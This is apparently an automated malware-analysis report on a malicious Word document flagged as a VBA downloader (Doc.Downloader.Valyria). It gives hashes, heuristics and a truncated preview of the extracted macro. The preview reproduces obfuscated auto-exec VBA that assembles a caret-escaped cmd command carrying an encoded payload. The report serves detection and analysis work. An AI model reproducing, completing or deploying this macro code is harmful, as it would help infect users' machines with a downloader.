Office (OLE) malware analysis — malicious · 411460b00dbc90de

MALICIOUS

Office (OLE)

84.4 KB Created: 2018-08-28 16:38:00 Authoring application: Microsoft Office Word First seen: 2018-10-07

MD5: 159ed4371c45501c7814f157fca6078a SHA-1: 7aa66ff55f540ca0e5ec043b011b15a6afc64567 SHA-256: 411460b00dbc90de4f2d353c449e9792d67cb2a6c5199472275f4635bb8fcfcf

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro is configured to auto-execute and uses the Shell() function, indicating an intent to run an external command or payload. The ClamAV detection name 'Doc.Downloader.Valyria-6667774-0' further supports its role as a downloader.

Heuristics 7

ClamAV: Doc.Downloader.Valyria-6667774-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Valyria-6667774-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10315 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10315 bytes
SHA-256: `747a25c3e991e6eba140b9d99005ce7e21d4c0dc9142a5d23495cc977692fbf4`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "VzwjvKOjLzrTt" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "loVHrOkvhq" Function UVFIYsODo() On _ Error _ Resume _ Next On _ Error _ Resume _ Next On _ Error _ Resume _ Next On _ Error _ Resume _ Next On _ Error _ Resume _ Next On _ Error _ Resume _ Next Error jOmiNC / 38220 / Khcnma * EYNpMT Error qVEOXB / 58536 * 47305 / QlzGc Error BdURvi / cTUIV aiCBcDPUUFn = "MD /v:^" + "O^" + " ^ /" + "R" + Chr(3 + 2 + 0 + 1 + 28) + " " + " ^" + "Se" + "^T " Error ZVVwM * owzfJ EPYAl = "^ " + "^ " + "^h" + "6^AV==^" + "AAIA" + "ACA^g" + "^A^A^I" + "AAC^" + "A^g^AAI" + "AACA" + "^g^AAI^" + "AAC" Error 91483 / aXaBcG / nlzBP / hnVfl Error bjctO * 76404 / zswMSc * DsJzCG Error lfTqNh * mmYjc Error 75938 / bLjbac / ktjus * WKCQo aSGmWuEL = "^" + "Ag" + "A^A^I" + "AACAg" + "A^AI" + "^A" + "AC^A^9^" + "B^" Error 89344 * 48244 Error 36931 / 77658 Error bVQnu * jBnGZw lBJcKFwILz = "Qf^As" + "HA^oB" + "^wY^A" + "QH^Ah" + "Bw^YA^0" Error Ijscsp / jlCwj * 5203 * 2442 Error 13978 / JqiRV / HYdfA / Fnfzz mmKoPja = "HA^7A^" + "w^aA" + "E^GAl" + "Bgc^AI^" + "G^A" + "^7" + "A^wV" Error 9289 * JWRfP * lFkjj * 3013 Error dcqcJ * 30137 Error 52054 * 22120 Error 60718 * 50433 Error 51616 * 9839 / 79159 * kzIjAZ Error offfm * 37881 Djuph = "^A^Y" + "E^" + "Ak^" + "B^" + "A^J" + "AAC" Error zSRiKq / 12838 * 22213 / iYzVj Error 51761 * qSLFP / 3178 / wrbpS Error AnQRTo * 12155 CqEzEu = "AtBQZA^" + "Q" + "^" + "H^" + "A^JBQ" + "L^A^U" + "^G^" + "Ar^B" Error 26748 * CGVhC / 51149 * GadiK Error 90174 * wvErG Error 86751 * 41699 * jzjuk * NhSPR Error 76781 * XLFOCm / RdQhR / zEkww pMtZKAqzkjQ = "^wb" + "^AY^H^A" + "uB^" + "QS^A" + "s^D" + "A" + "^p^" + "AwVAYE^" + "A^kBA" + "^JAAC" + "^A^s^A" Error BOqjGS / QMSKO * 56331 / RVwaZV jrzFsPPO = "^QQ^A" + "^wEAoB^" + "AJAgCA" + "^l" + "^" + "BAbA" + "k^GA" + "^G^" + "BA^Z" + "^AE^G^" + "AvBA^b^" + "A4^GA^3" + "B^wb" Error ALlKCn / HzSYj Error 11422 * HthpJ * 29234 * LvYJHh Error 66982 * 22212 / 51548 / hqXVH NbLnhPABlk = "^AQ" + "^E" + "AuA" + "^g^Z^A8" + "EA" + "B^B^" + "A" + "^" + "J^A" + "^s^" + "HA5" UVFIYsODo = aiCBcDPUUFn + EPYAl + aSGmWuEL + lBJcKFwILz + mmKoPja + Djuph + CqEzEu + pMtZKAqzkjQ + jrzFsPPO + NbLnhPABlk Error Zwooz / Gifztf Error 45041 / aNakz Error LMwEw * PjSjnP / 50329 / HAqlt Error 40700 * OGwQB * 30550 / mlPMzD Error qZbsw * 34395 * 5219 * LsPiX End Function Function AbsjEpwlwNf() On _ Error _ Resume _ Next On _ Error _ Resume _ Next On _ Error _ Resume _ Next On _ Error _ Resume _ Next Error sFmIBJ * CImfJ * 15466 * SjlGU Error 66304 / YmhSHP * 81619 / LPiak puzfa = "BgcA^" + "Q^H" + "A^7^" + "B^QKAQG" + "^" + "A^" + "o^B^A" + "V^A^" + "QCA^g" Error 5461 / 86385 * zTPhCa / NiUUBD Error aYijo * wrKPU / uQSDh * GjZjbG zYiMCUPul = "^Ag^" + "bA^k^" + "GA^" + "g" + "^AQQA^" + "w" + "E^A^oB" + "^" + "AJA" Error STlFZN * EjIDL Error wlWTu * 83007 Error pnRBQ / ZrDJtu XMILaRBwci = "gC^Ao^" + "B^w^YA" + "E^G" + "A" + "lBgc^A^" + "8" + "^G" + "^A^m^B" + "^wO" + "AcC^A^" + "lB" Error HMjwd * qkHDzf Error 72016 * OQtYis / lRFVjf / VlQBUz caGDGJUCr = "A^e^" + "AUG^A" + "u^A" + "^w^J" + "^As" + "CApB^" Error 20200 * jzXps / LEAVPk * 55101 Error PanbDI / pjPwvj / Sjzfrn * tvKQXn Error aIZnzo / rYZwn cuRjTtin = "gc^A^g" + "^F^A^k^" + "A^w^" + "K^" + "AcC" + "^" + "AcBw" + "J^" + "A" + "sC^A^" + "j^BQ^a" + "Aw" + "^" Error YFQlT / PSuVw Error 97282 / rGpXv Error HVZoZ / viFWf / 57226 * jUNfH lmFIYBHO = "G" + "AiBQ^" + "d" + "^A^AH^" + "A6^A" + "^gd^A" + "4" Error zDKEUf * mkQDXw / 5496 / ivMHwB Error zFtKz * CTJIS * iHkspB / UWzvL Error kVzitT / CFVas / 62741 / PkRik atJqfbRof = "^GAlB" + "A^J" + "^A^" + "0D^AX^" + "B^g ... (truncated)

SHA-256: 747a25c3e991e6eba140b9d99005ce7e21d4c0dc9142a5d23495cc977692fbf4

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "VzwjvKOjLzrTt"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "loVHrOkvhq"
Function UVFIYsODo()

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next
Error jOmiNC / 38220 / Khcnma * EYNpMT
   Error qVEOXB / 58536 * 47305 / QlzGc
   Error BdURvi / cTUIV
aiCBcDPUUFn = "MD /v:^" + "O^" + " ^    /" + "R" + Chr(3 + 2 + 0 + 1 + 28) + " " + " ^" + "Se" + "^T "
Error ZVVwM * owzfJ
EPYAl = "^ " + "^  " + "^h" + "6^AV==^" + "AAIA" + "ACA^g" + "^A^A^I" + "AAC^" + "A^g^AAI" + "AACA" + "^g^AAI^" + "AAC"
Error 91483 / aXaBcG / nlzBP / hnVfl
   Error bjctO * 76404 / zswMSc * DsJzCG
   Error lfTqNh * mmYjc
   Error 75938 / bLjbac / ktjus * WKCQo
aSGmWuEL = "^" + "Ag" + "A^A^I" + "AACAg" + "A^AI" + "^A" + "AC^A^9^" + "B^"
Error 89344 * 48244
   Error 36931 / 77658
   Error bVQnu * jBnGZw
lBJcKFwILz = "Qf^As" + "HA^oB" + "^wY^A" + "QH^Ah" + "Bw^YA^0"
Error Ijscsp / jlCwj * 5203 * 2442
   Error 13978 / JqiRV / HYdfA / Fnfzz
mmKoPja = "HA^7A^" + "w^aA" + "E^GAl" + "Bgc^AI^" + "G^A" + "^7" + "A^wV"
Error 9289 * JWRfP * lFkjj * 3013
   Error dcqcJ * 30137
   Error 52054 * 22120
   Error 60718 * 50433
   Error 51616 * 9839 / 79159 * kzIjAZ
   Error offfm * 37881
Djuph = "^A^Y" + "E^" + "Ak^" + "B^" + "A^J" + "AAC"
Error zSRiKq / 12838 * 22213 / iYzVj
   Error 51761 * qSLFP / 3178 / wrbpS
   Error AnQRTo * 12155
CqEzEu = "AtBQZA^" + "Q" + "^" + "H^" + "A^JBQ" + "L^A^U" + "^G^" + "Ar^B"
Error 26748 * CGVhC / 51149 * GadiK
   Error 90174 * wvErG
   Error 86751 * 41699 * jzjuk * NhSPR
   Error 76781 * XLFOCm / RdQhR / zEkww
pMtZKAqzkjQ = "^wb" + "^AY^H^A" + "uB^" + "QS^A" + "s^D" + "A" + "^p^" + "AwVAYE^" + "A^kBA" + "^JAAC" + "^A^s^A"
Error BOqjGS / QMSKO * 56331 / RVwaZV
jrzFsPPO = "^QQ^A" + "^wEAoB^" + "AJAgCA" + "^l" + "^" + "BAbA" + "k^GA" + "^G^" + "BA^Z" + "^AE^G^" + "AvBA^b^" + "A4^GA^3" + "B^wb"
Error ALlKCn / HzSYj
   Error 11422 * HthpJ * 29234 * LvYJHh
   Error 66982 * 22212 / 51548 / hqXVH
NbLnhPABlk = "^AQ" + "^E" + "AuA" + "^g^Z^A8" + "EA" + "B^B^" + "A" + "^" + "J^A" + "^s^" + "HA5"
UVFIYsODo = aiCBcDPUUFn + EPYAl + aSGmWuEL + lBJcKFwILz + mmKoPja + Djuph + CqEzEu + pMtZKAqzkjQ + jrzFsPPO + NbLnhPABlk
   Error Zwooz / Gifztf
   Error 45041 / aNakz
   Error LMwEw * PjSjnP / 50329 / HAqlt
   Error 40700 * OGwQB * 30550 / mlPMzD
   Error qZbsw * 34395 * 5219 * LsPiX
End Function
Function AbsjEpwlwNf()

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next
Error sFmIBJ * CImfJ * 15466 * SjlGU
   Error 66304 / YmhSHP * 81619 / LPiak
puzfa = "BgcA^" + "Q^H" + "A^7^" + "B^QKAQG" + "^" + "A^" + "o^B^A" + "V^A^" + "QCA^g"
Error 5461 / 86385 * zTPhCa / NiUUBD
   Error aYijo * wrKPU / uQSDh * GjZjbG
zYiMCUPul = "^Ag^" + "bA^k^" + "GA^" + "g" + "^AQQA^" + "w" + "E^A^oB" + "^" + "AJA"
Error STlFZN * EjIDL
   Error wlWTu * 83007
   Error pnRBQ / ZrDJtu
XMILaRBwci = "gC^Ao^" + "B^w^YA" + "E^G" + "A" + "lBgc^A^" + "8" + "^G" + "^A^m^B" + "^wO" + "AcC^A^" + "lB"
Error HMjwd * qkHDzf
   Error 72016 * OQtYis / lRFVjf / VlQBUz
caGDGJUCr = "A^e^" + "AUG^A" + "u^A" + "^w^J" + "^As" + "CApB^"
Error 20200 * jzXps / LEAVPk * 55101
   Error PanbDI / pjPwvj / Sjzfrn * tvKQXn
   Error aIZnzo / rYZwn
cuRjTtin = "gc^A^g" + "^F^A^k^" + "A^w^" + "K^" + "AcC" + "^" + "AcBw" + "J^" + "A" + "sC^A^" + "j^BQ^a" + "Aw" + "^"
Error YFQlT / PSuVw
   Error 97282 / rGpXv
   Error HVZoZ / viFWf / 57226 * jUNfH
lmFIYBHO = "G" + "AiBQ^" + "d" + "^A^AH^" + "A6^A" + "^gd^A" + "4"
Error zDKEUf * mkQDXw / 5496 / ivMHwB
   Error zFtKz * CTJIS * iHkspB / UWzvL
   Error kVzitT / CFVas / 62741 / PkRik
atJqfbRof = "^GAlB" + "A^J" + "^A^" + "0D^AX^" + "B^g
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.